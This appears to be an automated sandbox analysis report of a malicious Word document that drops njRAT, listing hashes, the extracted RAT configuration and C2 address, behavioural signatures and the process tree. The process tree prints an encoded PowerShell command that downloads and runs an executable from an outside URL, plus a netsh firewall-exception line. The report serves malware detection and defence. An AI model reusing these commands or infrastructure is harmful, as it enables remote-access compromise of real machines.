Analysis

  • max time kernel
    154s
  • max time network
    164s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    10-05-2021 16:02

General

  • Target

    2a8f04dd_by_Libranalysis.doc

  • Size

    43KB

  • MD5

    2a8f04ddc03f8c4db0821275619b55b4

  • SHA1

    8bf21477518f4f33bbd9f1a0f013302be516ea53

  • SHA256

    531471184d5c8eb4ec97c12059b5bbc8f397b3749033f7fd80405a1b560fbb17

  • SHA512

    27eb081ce75ae5015adc7368b109fd82b6fa7dfab627a4faa0a8cc43aa83385f75906e463b1a0cde23490f0274c150578c923c2fe3e9d2eec9e26492fd717c43

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://meetthepriestessatl.com/August2020.exe

Extracted

Family

njrat

Version

0.7d

Botnet

2021$$$

C2

194.5.98.210:4040

Mutex

0ef5de3f5b1fb89677ba03e41fa0a05a

Attributes
  • reg_key

    0ef5de3f5b1fb89677ba03e41fa0a05a

  • splitter

    |'|'|

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Drops startup file 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Obfuscated with Agile.Net obfuscator 1 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2a8f04dd_by_Libranalysis.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1020
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AbQBlAGUAdAB0AGgAZQBwAHIAaQBlAHMAdABlAHMAcwBhAHQAbAAuAGMAbwBtAC8AQQB1AGcAdQBzAHQAMgAwADIAMAAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAQwBmAE0AagBQAEgALgBlAHgAZQAnACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGUAbgB2ADoAYQBwAHAAZABhAHQAYQBcAEMAZgBNAGoAUABIAC4AZQB4AGUA
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1968
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AbQBlAGUAdAB0AGgAZQBwAHIAaQBlAHMAdABlAHMAcwBhAHQAbAAuAGMAbwBtAC8AQQB1AGcAdQBzAHQAMgAwADIAMAAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAQwBmAE0AagBQAEgALgBlAHgAZQAnACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGUAbgB2ADoAYQBwAHAAZABhAHQAYQBcAEMAZgBNAGoAUABIAC4AZQB4AGUA
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1712
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AbQBlAGUAdAB0AGgAZQBwAHIAaQBlAHMAdABlAHMAcwBhAHQAbAAuAGMAbwBtAC8AQQB1AGcAdQBzAHQAMgAwADIAMAAuAGUAeABlACcALAAoACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACkAKwAnAFwAQwBmAE0AagBQAEgALgBlAHgAZQAnACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGUAbgB2ADoAYQBwAHAAZABhAHQAYQBcAEMAZgBNAGoAUABIAC4AZQB4AGUA
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1672
          • C:\Users\Admin\AppData\Roaming\CfMjPH.exe
            "C:\Users\Admin\AppData\Roaming\CfMjPH.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:944
            • C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe
              "C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe"
              6⤵
              • Executes dropped EXE
              • Drops startup file
              • Adds Run key to start application
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:660
              • C:\Windows\SysWOW64\netsh.exe
                netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe" "AddInProcess32.exe" ENABLE
                7⤵
                  PID:1116
      • C:\Windows\splwow64.exe
        C:\Windows\splwow64.exe 12288
        2⤵
          PID:1056

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Persistence

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Defense Evasion

      Modify Registry

      2
      T1112

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe
        MD5

        6a673bfc3b67ae9782cb31af2f234c68

        SHA1

        7544e89566d91e84e3cd437b9a073e5f6b56566e

        SHA256

        978a4093058aa2ebf05dc353897d90d950324389879b57741b64160825b5ec0e

        SHA512

        72c302372ce87ceda2a3c70a6005d3f9c112f1641bc7fe6824c718971233e66c07e2996d2785fa358566c38714c25ea812c05c7cfd2f588284849d495fd24f39

      • C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe
        MD5

        6a673bfc3b67ae9782cb31af2f234c68

        SHA1

        7544e89566d91e84e3cd437b9a073e5f6b56566e

        SHA256

        978a4093058aa2ebf05dc353897d90d950324389879b57741b64160825b5ec0e

        SHA512

        72c302372ce87ceda2a3c70a6005d3f9c112f1641bc7fe6824c718971233e66c07e2996d2785fa358566c38714c25ea812c05c7cfd2f588284849d495fd24f39

      • C:\Users\Admin\AppData\Roaming\CfMjPH.exe
        MD5

        2300f1b5fea0e1d327cb2d45fed04af2

        SHA1

        2d057ca49419bc209d81d7cd7f60cf7691d3ea15

        SHA256

        6e8faa25a4a9df217eff05a0563d8d2628d229b0402ccf4010b35b7ebd1f751c

        SHA512

        37220e2967fec4f54df134d5d1ac7985fedf24a5e06bd1a7d4da85fcc12d08c2fdc4ff4838b7db18c4b452be700ef90203de7bd563f1cd82e4a087e760d1e163

      • C:\Users\Admin\AppData\Roaming\CfMjPH.exe
        MD5

        2300f1b5fea0e1d327cb2d45fed04af2

        SHA1

        2d057ca49419bc209d81d7cd7f60cf7691d3ea15

        SHA256

        6e8faa25a4a9df217eff05a0563d8d2628d229b0402ccf4010b35b7ebd1f751c

        SHA512

        37220e2967fec4f54df134d5d1ac7985fedf24a5e06bd1a7d4da85fcc12d08c2fdc4ff4838b7db18c4b452be700ef90203de7bd563f1cd82e4a087e760d1e163

      • \Users\Admin\AppData\Local\Temp\AddInProcess32.exe
        MD5

        6a673bfc3b67ae9782cb31af2f234c68

        SHA1

        7544e89566d91e84e3cd437b9a073e5f6b56566e

        SHA256

        978a4093058aa2ebf05dc353897d90d950324389879b57741b64160825b5ec0e

        SHA512

        72c302372ce87ceda2a3c70a6005d3f9c112f1641bc7fe6824c718971233e66c07e2996d2785fa358566c38714c25ea812c05c7cfd2f588284849d495fd24f39

      • \Users\Admin\AppData\Roaming\CfMjPH.exe
        MD5

        2300f1b5fea0e1d327cb2d45fed04af2

        SHA1

        2d057ca49419bc209d81d7cd7f60cf7691d3ea15

        SHA256

        6e8faa25a4a9df217eff05a0563d8d2628d229b0402ccf4010b35b7ebd1f751c

        SHA512

        37220e2967fec4f54df134d5d1ac7985fedf24a5e06bd1a7d4da85fcc12d08c2fdc4ff4838b7db18c4b452be700ef90203de7bd563f1cd82e4a087e760d1e163

      • \Users\Admin\AppData\Roaming\CfMjPH.exe
        MD5

        2300f1b5fea0e1d327cb2d45fed04af2

        SHA1

        2d057ca49419bc209d81d7cd7f60cf7691d3ea15

        SHA256

        6e8faa25a4a9df217eff05a0563d8d2628d229b0402ccf4010b35b7ebd1f751c

        SHA512

        37220e2967fec4f54df134d5d1ac7985fedf24a5e06bd1a7d4da85fcc12d08c2fdc4ff4838b7db18c4b452be700ef90203de7bd563f1cd82e4a087e760d1e163

      • memory/660-108-0x000000000040747E-mapping.dmp
      • memory/660-111-0x0000000000400000-0x000000000040A000-memory.dmp
        Filesize

        40KB

      • memory/660-115-0x0000000004C40000-0x0000000004C41000-memory.dmp
        Filesize

        4KB

      • memory/660-107-0x0000000000400000-0x000000000040A000-memory.dmp
        Filesize

        40KB

      • memory/944-98-0x0000000000DE0000-0x0000000000DE1000-memory.dmp
        Filesize

        4KB

      • memory/944-102-0x00000000007A0000-0x00000000007C1000-memory.dmp
        Filesize

        132KB

      • memory/944-95-0x0000000000000000-mapping.dmp
      • memory/944-100-0x0000000004A90000-0x0000000004A91000-memory.dmp
        Filesize

        4KB

      • memory/944-105-0x00000000006E0000-0x00000000006E1000-memory.dmp
        Filesize

        4KB

      • memory/944-104-0x0000000000BB0000-0x0000000000BBB000-memory.dmp
        Filesize

        44KB

      • memory/944-103-0x0000000004A91000-0x0000000004A92000-memory.dmp
        Filesize

        4KB

      • memory/1020-116-0x000000005FFF0000-0x0000000060000000-memory.dmp
        Filesize

        64KB

      • memory/1020-60-0x0000000072111000-0x0000000072114000-memory.dmp
        Filesize

        12KB

      • memory/1020-62-0x000000005FFF0000-0x0000000060000000-memory.dmp
        Filesize

        64KB

      • memory/1020-61-0x000000006FB91000-0x000000006FB93000-memory.dmp
        Filesize

        8KB

      • memory/1056-67-0x0000000000000000-mapping.dmp
      • memory/1056-68-0x000007FEFB7B1000-0x000007FEFB7B3000-memory.dmp
        Filesize

        8KB

      • memory/1116-113-0x0000000000000000-mapping.dmp
      • memory/1672-70-0x0000000004930000-0x0000000004931000-memory.dmp
        Filesize

        4KB

      • memory/1672-92-0x0000000006320000-0x0000000006321000-memory.dmp
        Filesize

        4KB

      • memory/1672-91-0x00000000055D0000-0x00000000055D1000-memory.dmp
        Filesize

        4KB

      • memory/1672-84-0x0000000006290000-0x0000000006291000-memory.dmp
        Filesize

        4KB

      • memory/1672-83-0x00000000056C0000-0x00000000056C1000-memory.dmp
        Filesize

        4KB

      • memory/1672-82-0x000000007EF30000-0x000000007EF31000-memory.dmp
        Filesize

        4KB

      • memory/1672-77-0x0000000005600000-0x0000000005601000-memory.dmp
        Filesize

        4KB

      • memory/1672-74-0x0000000005240000-0x0000000005241000-memory.dmp
        Filesize

        4KB

      • memory/1672-73-0x00000000024D0000-0x00000000024D1000-memory.dmp
        Filesize

        4KB

      • memory/1672-72-0x0000000004932000-0x0000000004933000-memory.dmp
        Filesize

        4KB

      • memory/1672-71-0x0000000004970000-0x0000000004971000-memory.dmp
        Filesize

        4KB

      • memory/1672-69-0x0000000002380000-0x0000000002381000-memory.dmp
        Filesize

        4KB

      • memory/1672-66-0x0000000075451000-0x0000000075453000-memory.dmp
        Filesize

        8KB

      • memory/1672-65-0x0000000000000000-mapping.dmp
      • memory/1712-64-0x0000000000000000-mapping.dmp
      • memory/1968-63-0x0000000000000000-mapping.dmp